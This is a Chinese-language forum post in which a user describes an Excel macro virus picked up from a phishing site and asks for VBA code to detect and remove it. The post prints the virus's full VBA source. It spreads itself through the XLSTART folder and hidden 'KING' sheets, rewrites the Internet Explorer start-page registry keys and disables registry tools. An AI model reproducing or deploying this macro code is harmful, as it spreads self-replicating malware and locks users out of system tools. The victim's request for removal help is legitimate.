最近打开一个钓鱼网站,打开后发现IE首页被篡改为http://3azu.taobao.com.通EXCLE每次打开会提示宏被禁用,启用后查看宏发现加载两个宏,king.auto_open和king.ck_files。VBA下会建立一个模块名称为KING。C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\XLSTART下出现了king.xlsh和result.xls两个文件。删除后打开的表格不再出现宏,但其他的又出现了。
通过VBA查看病毒代码如下:
Sub auto_open()
Application.OnSheetActivate = "ck_files"
End Sub
Sub ck_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "" & "KING.XLS") 'results
If m$ = "KING.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
Select Case whichfile
Case 10
Application.ScreenUpdating = False
n4$ = ActiveWorkbook.name
Sheets("KING").Visible = True
Sheets("KING").Select
Sheets("KING").Copy
With ActiveWorkbook
.Title = ""
.Subject = ""
.Author = ""
.Keywords = ""
.Comments = ""
End With
newname$ = ActiveWorkbook.name
c4$ = CurDir()
ChDir Application.StartupPath
ActiveWindow.Visible = False
Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "KING.XLS", FileFormat:=xlNormal _
, password:="", WriteResPassword:="", ReadOnlyRecommended:= _
False, CreateBackup:=False
ChDir c4$
Workbooks(n4$).Sheets("KING").Visible = False
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "KING.XLS!ck_files"
Case 1
Application.ScreenUpdating = False
n4$ = ActiveWorkbook.name
p4$ = ActiveWorkbook.Path
s$ = Workbooks(n4$).Sheets(1).name
If s$ <> "KING" Then
Workbooks("KING.XLS").Sheets("KING").Copy before:=Workbooks(n4$).Sheets(1)
Workbooks(n4$).Sheets("KING").Visible = False
Else
End If
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "KING.XLS!ck_files"
Case Else
End Select
Dim OperationRegistry
On Error Resume Next
Set OperationRegistry = CreateObject("WScript.Shell")
MyUrl = "http://3azu.taobao.com"
RegPath = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Start Page"
OperationRegistry.RegWrite RegPath, MyUrl
RegPath = "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\Internet Explorer\Main\Start Page"
OperationRegistry.RegWrite RegPath, MyUrl
RegPath = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"
OperationRegistry.RegWrite RegPath, "1", "REG_DWORD"
Exit Sub '正常运行的话会在这里退出程序
End Sub
能否帮助用VBA代码写一个打开EXCEL文件可以自动发检测是否有病毒病删除的语句。